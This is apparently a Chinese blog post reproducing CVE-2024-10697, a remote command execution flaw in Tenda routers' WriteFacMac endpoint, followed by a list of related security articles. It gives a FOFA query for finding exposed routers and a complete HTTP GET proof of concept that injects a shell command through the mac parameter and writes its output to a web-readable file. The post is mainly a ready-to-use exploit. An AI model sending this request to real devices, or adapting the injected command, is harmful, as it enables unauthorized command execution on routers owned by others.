tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697)

一、漏洞简介

tenda路由器WriteFacMac存在远程命令执行漏洞

二、漏洞影响

css 复制代码
tenda路由器

三、网络测绘:

css 复制代码
fofa:
title="Tenda | LOGIN"

四、复现过程

POC 1

http 复制代码
GET /goform/WriteFacMac?mac=`ls%20%3E/webroot/1.txt` HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0

访问

url/1.txt

相关推荐
安全系统学习1 小时前
网络安全逆向分析之rust逆向技巧
前端·算法·安全·web安全·网络安全·中间件
mooyuan天天2 小时前
pikachu靶场通关笔记15 CSRF关卡01-CSRF(GET)
web安全·csrf·pikachu靶场·csrf漏洞
shenyan~3 小时前
关于Web安全:8. Web 攻击流量分析与自动化
网络·web安全·自动化
mooyuan天天4 小时前
pikachu靶场通关笔记16 CSRF关卡02-CSRF(POST)
web安全·csrf·pikachu靶场·csrf漏洞
淡水猫.5 小时前
Next.js 中间件鉴权绕过漏洞 CVE-2025-29927
javascript·安全·web安全·中间件
网安INF17 小时前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞
CatalyzeSec18 小时前
一些实用的chrome扩展0x01
安全·web安全·网络安全
黑客笔记19 小时前
攻防世界-XCTF-Web安全最佳刷题路线
大数据·安全·web安全
独行soc1 天前
2025年渗透测试面试题总结-腾讯[实习]玄武实验室-安全工程师(题目+回答)
linux·安全·web安全·面试·职场和发展·渗透测试·区块链
饮长安千年月1 天前
JavaSec-SSTI - 模板引擎注入
java·windows·安全·web安全·网络安全·系统安全·安全架构